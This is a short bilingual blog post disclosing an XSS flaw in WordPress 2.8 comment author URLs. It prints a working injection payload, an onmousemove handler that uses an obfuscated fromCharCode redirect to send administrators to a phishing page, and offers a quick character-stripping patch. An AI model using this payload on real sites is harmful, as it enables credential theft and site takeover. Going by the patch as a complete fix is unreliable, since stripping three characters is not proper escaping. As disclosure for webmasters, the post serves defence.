WordPress 2.8 Xss 0DAY 漏洞

pop:今天别人在群里面发出来的,简单的翻译了一下,类似是跨站的漏洞,鬼仔那里也有分析了,地址附在最后。

It had been published that wordpress 2.8 All version are suffering from Xss,attackers can use this to do fishing,they make a wordpress login page as it is your own.If you don’t take care,your password will be sent to the attacker’s website.With your password,they can edit pages and upload webshell.It is harmful.

How is the attacker do this?(如何进行入侵?)
they insert website url like this(in the comments write place):

http://www.vul.kr’ onmousemove=’location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,118,117,108,46,107,114,47,63,112,61,53,54,57);

If someone(or administrator) moved his mouse on the author’s website.It will jump to another URL,which is a fishing page.

How can we patch it?(如何打上补丁?)

Edit wp-comments-post.php
go line 40 and then add:
$comment_author_url = str_replace(chr(39),”,$comment_author_url);
$comment_author_url = str_replace(chr(59),”,$comment_author_url);
$comment_author_url = str_replace(chr(44),”,$comment_author_url);

最后是提示管理员的:
Webmasters,please patch it as soon as you can.

WordPress 2.8.1 评论显示xss漏洞
http://huaidan.org/archives/3228.html

Be Careful,Wordpress 2.8 All Version Xss 0DAY
http://www.vul.kr/?p=569

Related Posts